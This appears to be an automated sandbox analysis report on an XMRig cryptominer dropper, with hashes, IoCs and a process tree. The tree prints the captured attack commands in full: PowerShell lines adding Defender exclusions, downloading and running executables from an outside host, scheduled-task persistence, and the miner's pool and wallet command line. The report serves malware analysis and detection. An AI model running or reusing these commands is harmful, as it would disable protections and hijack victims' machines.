xmrig | 82f585a45f06cd6c344d3bf8fe6081a074ac38f83015d9675a2dc4e2363f5c20

Analysis

max time kernel
160s
max time network
129s
platform
windows10_x64
resource
win10-en-20210920
submitted
14-10-2021 05:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2d82ec0905de054cd685e6a52e2d9442.exe
Size

4KB
MD5

2d82ec0905de054cd685e6a52e2d9442
SHA1

1fb5c5b876563affb7ee45872e286cf0ffddb965
SHA256

82f585a45f06cd6c344d3bf8fe6081a074ac38f83015d9675a2dc4e2363f5c20
SHA512

eeee0806ef980230966d3e6318d974fe6faf02b0b7952a1671cbc5fdff66c7cef68218483433a72ba6277ab9c5f556c7d3a39e2ad6851f42c4705f3d7a2666e4

Score

10^/10

xmrig miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://cx55566.tmweb.ru/farm_money.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://cx55566.tmweb.ru/monero-bandit.exe

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/2988-987-0x00000001402F327C-mapping.dmp	xmrig
behavioral2/memory/2988-1001-0x0000000140000000-0x0000000140763000-memory.dmp	xmrig

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.execmd.exe

flow pid process

28 3556 powershell.exe
29 1784 powershell.exe
33 2988 cmd.exe
Downloads MZ/PE file
Executes dropped EXE 6 IoCs

Processes:

gfhfg.exeFsdgde.exeshrome.exeservices64.exesihost32.exesihost64.exe

pid process

2948 gfhfg.exe
3056 Fsdgde.exe
3428 shrome.exe
1672 services64.exe
796 sihost32.exe
3624 sihost64.exe

flow	pid	process
28	3556	powershell.exe
29	1784	powershell.exe
33	2988	cmd.exe

pid	process
2948	gfhfg.exe
3056	Fsdgde.exe
3428	shrome.exe
1672	services64.exe
796	sihost32.exe
3624	sihost64.exe

Drops file in System32 directory 5 IoCs

Processes:

conhost.execonhost.execonhost.execonhost.exe

description	ioc	process
File created	C:\Windows\system32\shrome.exe	conhost.exe
File created	C:\Windows\system32\services64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Telemetry\sihost32.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\sihost64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\WR64.sys	conhost.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 1812 set thread context of 2988 1812 conhost.exe cmd.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

3128 schtasks.exe
3472 schtasks.exe

description	pid	process	target process
PID 1812 set thread context of 2988	1812	conhost.exe	cmd.exe

pid	process
3128	schtasks.exe
3472	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exepowershell.execonhost.exepowershell.execonhost.exepowershell.execonhost.exepowershell.execmd.exe

pid	process
3324	powershell.exe
3324	powershell.exe
3324	powershell.exe
2504	powershell.exe
2504	powershell.exe
2504	powershell.exe
3556	powershell.exe
3556	powershell.exe
3556	powershell.exe
1784	powershell.exe
1784	powershell.exe
1784	powershell.exe
2304	powershell.exe
2304	powershell.exe
2304	powershell.exe
3508	powershell.exe
3508	powershell.exe
3508	powershell.exe
2156	conhost.exe
688	powershell.exe
688	powershell.exe
688	powershell.exe
2252	conhost.exe
4004	powershell.exe
4004	powershell.exe
4004	powershell.exe
396	conhost.exe
396	conhost.exe
2920	powershell.exe
2920	powershell.exe
2920	powershell.exe
1812	conhost.exe
1812	conhost.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe
2988	cmd.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exepowershell.execonhost.exepowershell.execonhost.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3324	powershell.exe
Token: SeDebugPrivilege	2504	powershell.exe
Token: SeDebugPrivilege	3556	powershell.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	2304	powershell.exe
Token: SeDebugPrivilege	3508	powershell.exe
Token: SeDebugPrivilege	2156	conhost.exe
Token: SeDebugPrivilege	688	powershell.exe
Token: SeIncreaseQuotaPrivilege	688	powershell.exe
Token: SeSecurityPrivilege	688	powershell.exe
Token: SeTakeOwnershipPrivilege	688	powershell.exe
Token: SeLoadDriverPrivilege	688	powershell.exe
Token: SeSystemProfilePrivilege	688	powershell.exe
Token: SeSystemtimePrivilege	688	powershell.exe
Token: SeProfSingleProcessPrivilege	688	powershell.exe
Token: SeIncBasePriorityPrivilege	688	powershell.exe
Token: SeCreatePagefilePrivilege	688	powershell.exe
Token: SeBackupPrivilege	688	powershell.exe
Token: SeRestorePrivilege	688	powershell.exe
Token: SeShutdownPrivilege	688	powershell.exe
Token: SeDebugPrivilege	688	powershell.exe
Token: SeSystemEnvironmentPrivilege	688	powershell.exe
Token: SeRemoteShutdownPrivilege	688	powershell.exe
Token: SeUndockPrivilege	688	powershell.exe
Token: SeManageVolumePrivilege	688	powershell.exe
Token: 33	688	powershell.exe
Token: 34	688	powershell.exe
Token: 35	688	powershell.exe
Token: 36	688	powershell.exe
Token: SeDebugPrivilege	2252	conhost.exe
Token: SeDebugPrivilege	4004	powershell.exe
Token: SeIncreaseQuotaPrivilege	4004	powershell.exe
Token: SeSecurityPrivilege	4004	powershell.exe
Token: SeTakeOwnershipPrivilege	4004	powershell.exe
Token: SeLoadDriverPrivilege	4004	powershell.exe
Token: SeSystemProfilePrivilege	4004	powershell.exe
Token: SeSystemtimePrivilege	4004	powershell.exe
Token: SeProfSingleProcessPrivilege	4004	powershell.exe
Token: SeIncBasePriorityPrivilege	4004	powershell.exe
Token: SeCreatePagefilePrivilege	4004	powershell.exe
Token: SeBackupPrivilege	4004	powershell.exe
Token: SeRestorePrivilege	4004	powershell.exe
Token: SeShutdownPrivilege	4004	powershell.exe
Token: SeDebugPrivilege	4004	powershell.exe
Token: SeSystemEnvironmentPrivilege	4004	powershell.exe
Token: SeRemoteShutdownPrivilege	4004	powershell.exe
Token: SeUndockPrivilege	4004	powershell.exe
Token: SeManageVolumePrivilege	4004	powershell.exe
Token: 33	4004	powershell.exe
Token: 34	4004	powershell.exe
Token: 35	4004	powershell.exe
Token: 36	4004	powershell.exe
Token: SeDebugPrivilege	396	conhost.exe
Token: SeDebugPrivilege	2920	powershell.exe
Token: SeIncreaseQuotaPrivilege	2920	powershell.exe
Token: SeSecurityPrivilege	2920	powershell.exe
Token: SeTakeOwnershipPrivilege	2920	powershell.exe
Token: SeLoadDriverPrivilege	2920	powershell.exe
Token: SeSystemProfilePrivilege	2920	powershell.exe
Token: SeSystemtimePrivilege	2920	powershell.exe
Token: SeProfSingleProcessPrivilege	2920	powershell.exe
Token: SeIncBasePriorityPrivilege	2920	powershell.exe
Token: SeCreatePagefilePrivilege	2920	powershell.exe
Token: SeBackupPrivilege	2920	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2d82ec0905de054cd685e6a52e2d9442.execmd.exepowershell.exepowershell.exegfhfg.execonhost.execmd.execmd.exeFsdgde.execonhost.execmd.execmd.execmd.exeshrome.execonhost.execmd.exeservices64.exe

description	pid	process	target process
PID 1720 wrote to memory of 2172	1720	2d82ec0905de054cd685e6a52e2d9442.exe	cmd.exe
PID 1720 wrote to memory of 2172	1720	2d82ec0905de054cd685e6a52e2d9442.exe	cmd.exe
PID 1720 wrote to memory of 2172	1720	2d82ec0905de054cd685e6a52e2d9442.exe	cmd.exe
PID 2172 wrote to memory of 3324	2172	cmd.exe	powershell.exe
PID 2172 wrote to memory of 3324	2172	cmd.exe	powershell.exe
PID 2172 wrote to memory of 3324	2172	cmd.exe	powershell.exe
PID 2172 wrote to memory of 2504	2172	cmd.exe	powershell.exe
PID 2172 wrote to memory of 2504	2172	cmd.exe	powershell.exe
PID 2172 wrote to memory of 2504	2172	cmd.exe	powershell.exe
PID 2172 wrote to memory of 3556	2172	cmd.exe	powershell.exe
PID 2172 wrote to memory of 3556	2172	cmd.exe	powershell.exe
PID 2172 wrote to memory of 3556	2172	cmd.exe	powershell.exe
PID 2172 wrote to memory of 1784	2172	cmd.exe	powershell.exe
PID 2172 wrote to memory of 1784	2172	cmd.exe	powershell.exe
PID 2172 wrote to memory of 1784	2172	cmd.exe	powershell.exe
PID 2172 wrote to memory of 2304	2172	cmd.exe	powershell.exe
PID 2172 wrote to memory of 2304	2172	cmd.exe	powershell.exe
PID 2172 wrote to memory of 2304	2172	cmd.exe	powershell.exe
PID 2304 wrote to memory of 2948	2304	powershell.exe	gfhfg.exe
PID 2304 wrote to memory of 2948	2304	powershell.exe	gfhfg.exe
PID 2172 wrote to memory of 3508	2172	cmd.exe	powershell.exe
PID 2172 wrote to memory of 3508	2172	cmd.exe	powershell.exe
PID 2172 wrote to memory of 3508	2172	cmd.exe	powershell.exe
PID 3508 wrote to memory of 3056	3508	powershell.exe	Fsdgde.exe
PID 3508 wrote to memory of 3056	3508	powershell.exe	Fsdgde.exe
PID 2948 wrote to memory of 2156	2948	gfhfg.exe	conhost.exe
PID 2948 wrote to memory of 2156	2948	gfhfg.exe	conhost.exe
PID 2948 wrote to memory of 2156	2948	gfhfg.exe	conhost.exe
PID 2156 wrote to memory of 3280	2156	conhost.exe	cmd.exe
PID 2156 wrote to memory of 3280	2156	conhost.exe	cmd.exe
PID 3280 wrote to memory of 688	3280	cmd.exe	powershell.exe
PID 3280 wrote to memory of 688	3280	cmd.exe	powershell.exe
PID 2156 wrote to memory of 1064	2156	conhost.exe	cmd.exe
PID 2156 wrote to memory of 1064	2156	conhost.exe	cmd.exe
PID 1064 wrote to memory of 3128	1064	cmd.exe	schtasks.exe
PID 1064 wrote to memory of 3128	1064	cmd.exe	schtasks.exe
PID 3056 wrote to memory of 2252	3056	Fsdgde.exe	conhost.exe
PID 3056 wrote to memory of 2252	3056	Fsdgde.exe	conhost.exe
PID 3056 wrote to memory of 2252	3056	Fsdgde.exe	conhost.exe
PID 3280 wrote to memory of 4004	3280	cmd.exe	powershell.exe
PID 3280 wrote to memory of 4004	3280	cmd.exe	powershell.exe
PID 2252 wrote to memory of 1752	2252	conhost.exe	cmd.exe
PID 2252 wrote to memory of 1752	2252	conhost.exe	cmd.exe
PID 1752 wrote to memory of 3472	1752	cmd.exe	schtasks.exe
PID 1752 wrote to memory of 3472	1752	cmd.exe	schtasks.exe
PID 2156 wrote to memory of 3724	2156	conhost.exe	cmd.exe
PID 2156 wrote to memory of 3724	2156	conhost.exe	cmd.exe
PID 3724 wrote to memory of 3428	3724	cmd.exe	shrome.exe
PID 3724 wrote to memory of 3428	3724	cmd.exe	shrome.exe
PID 2252 wrote to memory of 2948	2252	conhost.exe	cmd.exe
PID 2252 wrote to memory of 2948	2252	conhost.exe	cmd.exe
PID 2948 wrote to memory of 1672	2948	cmd.exe	services64.exe
PID 2948 wrote to memory of 1672	2948	cmd.exe	services64.exe
PID 3428 wrote to memory of 396	3428	shrome.exe	conhost.exe
PID 3428 wrote to memory of 396	3428	shrome.exe	conhost.exe
PID 3428 wrote to memory of 396	3428	shrome.exe	conhost.exe
PID 396 wrote to memory of 3500	396	conhost.exe	cmd.exe
PID 396 wrote to memory of 3500	396	conhost.exe	cmd.exe
PID 3500 wrote to memory of 2920	3500	cmd.exe	powershell.exe
PID 3500 wrote to memory of 2920	3500	cmd.exe	powershell.exe
PID 396 wrote to memory of 796	396	conhost.exe	sihost32.exe
PID 396 wrote to memory of 796	396	conhost.exe	sihost32.exe
PID 1672 wrote to memory of 1812	1672	services64.exe	conhost.exe
PID 1672 wrote to memory of 1812	1672	services64.exe	conhost.exe

C:\Users\Admin\AppData\Local\Temp\2d82ec0905de054cd685e6a52e2d9442.exe
"C:\Users\Admin\AppData\Local\Temp\2d82ec0905de054cd685e6a52e2d9442.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1720

C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & powershell "(New-Object System.Net.WebClient).DownloadFile('http://cx55566.tmweb.ru/farm_money.exe', (Join-Path -Path $env:Temp -ChildPath 'gfhfg.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('http://cx55566.tmweb.ru/monero-bandit.exe', (Join-Path -Path $env:Temp -ChildPath 'Fsdgde.exe'))" & powershell "Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'gfhfg.exe')" & powershell "Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'Fsdgde.exe')" & exit
2⤵
- Suspicious use of WriteProcessMemory
PID:2172

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3324

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2504

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "(New-Object System.Net.WebClient).DownloadFile('http://cx55566.tmweb.ru/farm_money.exe', (Join-Path -Path $env:Temp -ChildPath 'gfhfg.exe'))"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3556

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "(New-Object System.Net.WebClient).DownloadFile('http://cx55566.tmweb.ru/monero-bandit.exe', (Join-Path -Path $env:Temp -ChildPath 'Fsdgde.exe'))"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'gfhfg.exe')"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2304

C:\Users\Admin\AppData\Local\Temp\gfhfg.exe
"C:\Users\Admin\AppData\Local\Temp\gfhfg.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2948

C:\Windows\System32\conhost.exe
"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\gfhfg.exe"
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2156

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
6⤵
- Suspicious use of WriteProcessMemory
PID:3280

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4004

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "shrome" /tr "C:\Windows\system32\shrome.exe"
6⤵
- Suspicious use of WriteProcessMemory
PID:1064

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "shrome" /tr "C:\Windows\system32\shrome.exe"
7⤵
- Creates scheduled task(s)
PID:3128

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Windows\system32\shrome.exe"
6⤵
- Suspicious use of WriteProcessMemory
PID:3724

C:\Windows\system32\shrome.exe
C:\Windows\system32\shrome.exe
7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3428

C:\Windows\System32\conhost.exe
"C:\Windows\System32\\conhost.exe" "C:\Windows\system32\shrome.exe"
8⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:396

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
9⤵
- Suspicious use of WriteProcessMemory
PID:3500

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
10⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
10⤵
- Suspicious behavior: EnumeratesProcesses
PID:3720

C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
9⤵
- Executes dropped EXE
PID:796

C:\Windows\System32\conhost.exe
"C:\Windows\System32\\conhost.exe" "/sihost32"
10⤵
PID:4028

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'Fsdgde.exe')"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3508

C:\Users\Admin\AppData\Local\Temp\Fsdgde.exe
"C:\Users\Admin\AppData\Local\Temp\Fsdgde.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3056

C:\Windows\System32\conhost.exe
"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Fsdgde.exe"
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2252

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
6⤵
- Suspicious use of WriteProcessMemory
PID:1752

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
7⤵
- Creates scheduled task(s)
PID:3472

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Windows\system32\services64.exe"
6⤵
- Suspicious use of WriteProcessMemory
PID:2948

C:\Windows\system32\services64.exe
C:\Windows\system32\services64.exe
7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1672

C:\Windows\System32\conhost.exe
"C:\Windows\System32\\conhost.exe" "C:\Windows\system32\services64.exe"
8⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1812

C:\Windows\system32\Microsoft\Libs\sihost64.exe
"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
9⤵
- Executes dropped EXE
PID:3624

C:\Windows\System32\conhost.exe
"C:\Windows\System32\\conhost.exe" "/sihost64"
10⤵
PID:1140

C:\Windows\System32\cmd.exe
C:\Windows/System32\cmd.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:5555 --user=44z5DkTXSYBfYECbt5TdQ2SUpyAQJmmGubyUsWqzcByeKwxwsWSZabZQMuE39hedNcTL15eK8kHrAeZMUdGGmHQHBzNH5db --pass=bandit --cpu-max-threads-hint=10 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --cinit-stealth
9⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:2988

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
MD5
84f2160705ac9a032c002f966498ef74

SHA1
e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

SHA256
7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

SHA512
f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
a16257a8f3f6eada4d6aefeea9d3ceff

SHA1
4f3d23498b615e9f8c142d0a1c91a17975146362

SHA256
481609765d96fc917581d91c55a4fb0de9fecd1cc9e2d9867f03293c8d699f70

SHA512
88f5479245fbf13b8cd32119db2d9c2a7ba4f71224a6570ee2e3322601b63ce74a71ab8fad54fb35b0239c80e76eec7b27e1eaa20696bb2b4a92337f257ae887

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
6ad94fe5250d30dfce75357a5ec547d4

SHA1
e9b5123e3cabada41c7271508cf18c6d0b807dbd

SHA256
584eaf1a18f5694abb60631fca7e6396677953671e3d1b7df335f83323dfa6fc

SHA512
5ba059b92bdc7c1ded37d64f8893c8a1b1d551e5a2f69073eb26c869ece715bb0db7436d74ceb0fafbda6cdccc97f94b0971893adef31bea80ab084f0f955837

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
ec616463c724f471c56be16a37452f49

SHA1
90d02eec491926e46dc92cfc3b88ee639a10e504

SHA256
b0bb44a1a6e1b8d69aae75884851eaa25f5d57d114eaf218739000dd3aaa046b

SHA512
7a70bdfcc964b9c76d22e58872020f927e55a1714b75fff1b93f702882695b554c0901657d52f4fb43b8a58ee7a431717241b76b1361ddb28b158928bf66e7e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
22b50ec8ddf4984ecb5927bc09f6bc27

SHA1
0fe9cd276be89fe2957797bee86dabf3619f40de

SHA256
6a6b091cc6a1c6b3fbdd2a9fcdedd3e0aee64710ed63f7daa04ceded6f5b298c

SHA512
1a23ff3ca3425fbb168e230efb72bc97004dda58bae73d66e12a0c9fce27a9dd1ac27020eb4d6a5dbff040f0b451dd1ec0536d441feec06074d25ea1b4cbecb4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
83f1442164c8eb3d5f3842dd6e8b69b2

SHA1
0a0c0eea4b60941f31e72d1be2be38ca88b194e8

SHA256
79e7ffeebca7b25a2f40e4c0587620e6c6c4ddae8c4311647e1b45b8b1ca8020

SHA512
cb75ed8ee79568ea519a5da4bf99b1728ccfe71efc30f6983161ab53c2fae8894a9681a895141caf7cbc79cabe97196f10b4322dce374dd691ab4e64d20a423a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
dbdcb36a4bcd9b3e2e213fb42df127ee

SHA1
abda7ca609df3de702e6c7d845dfa2b940fa4dd0

SHA256
c3644b35899571c4be71764db189ca0614ce50ad1d876d6a79a0d043ce9001e8

SHA512
62ed8f973091836f71e96444ad2342817031e0ae4a158d7fb4c54c11519903c709974c361710fe32f48a5a4d1964310f1909c337e03dfefbdc147d913dddf09c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
2e170e2d8b97e20094a123f0cd7c780f

SHA1
3b246653095cacf911c43678826809592b1b89e3

SHA256
9245b52816bdcbac5a6f683bd2790256a0107e1d1df3a2659e2d02e6af8b99a9

SHA512
ef9d769a61877c041270eb177a2130c59282b52b390c590ace66b494ba9744a1ba6783ae67d6275d240dd5eb0826a04a78a4b882332c4899f06a111569cb581f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
bf519334ea0b54617d224ee6b0817968

SHA1
0b476d3d35a3a27957a9211a8d7af7ca4b405df4

SHA256
4151d25f61dff09da71b698689d98eb5247f6091bb88b5186ccdc4dc724ea661

SHA512
f17f1660eb9ff176d1ed8c42a137dfab137f10ca2151f0936e615d7b4bfed6c84afb567ca418f1f912297ff9bfb25043d5a3b9ffdabc435b4bdb4f812a5a7b68

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
464438c67af5b285a0646f97bf9211ce

SHA1
7abd8d5ed0a0b8ab423c32cbe0f4f598b7a6a7d7

SHA256
1f69ed2df2e1f4088f640beef8f5e0c6ac094337daea026a86d79e7addaf095e

SHA512
510774e86d5bbbe24245ecc150206a0a79ba3160bf27f28a07b88ffdc1542e2f6b7f7dea3135fc7a8ab72eb911bbeb97fc524e87d821ac2aa3d14357ed19282f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Fsdgde.exe
MD5
342ef4f2941187bdc7f66d148be0ff75

SHA1
7ff601a24c42ec01ef62c097927688a431c5aa76

SHA256
046976da5783b0425976084bc16ababee1094e98a1f0648fc10c91dcf49bc395

SHA512
84d9c5c7b83481e18efeecf8814bd050fd283dc1408a9a02fdc786ae2f8f08355ff87e24ab47a75e08291f0d75e8ae6747bb247e6a8859e8662d1999454605b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Fsdgde.exe
MD5
342ef4f2941187bdc7f66d148be0ff75

SHA1
7ff601a24c42ec01ef62c097927688a431c5aa76

SHA256
046976da5783b0425976084bc16ababee1094e98a1f0648fc10c91dcf49bc395

SHA512
84d9c5c7b83481e18efeecf8814bd050fd283dc1408a9a02fdc786ae2f8f08355ff87e24ab47a75e08291f0d75e8ae6747bb247e6a8859e8662d1999454605b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\gfhfg.exe
MD5
fa409741e16094bb8bc373d7b46742cd

SHA1
e082dd13c52fe7fb65fac801d2588e0c9153d9cc

SHA256
c5c1c355c0e253df7b6a49d296c00663cc9692328dd236ab4f43fafc2ec70ec8

SHA512
7cedd8048df9b44587f55c9ccc5afcd8f0ada0fa119c9848a3c19f364fcdd947b8e54dab9ffce0f425484bb76f7d7e5db18a7516ddb5cde9a4f053e6c105046f

Download Submit
C:\Users\Admin\AppData\Local\Temp\gfhfg.exe
MD5
fa409741e16094bb8bc373d7b46742cd

SHA1
e082dd13c52fe7fb65fac801d2588e0c9153d9cc

SHA256
c5c1c355c0e253df7b6a49d296c00663cc9692328dd236ab4f43fafc2ec70ec8
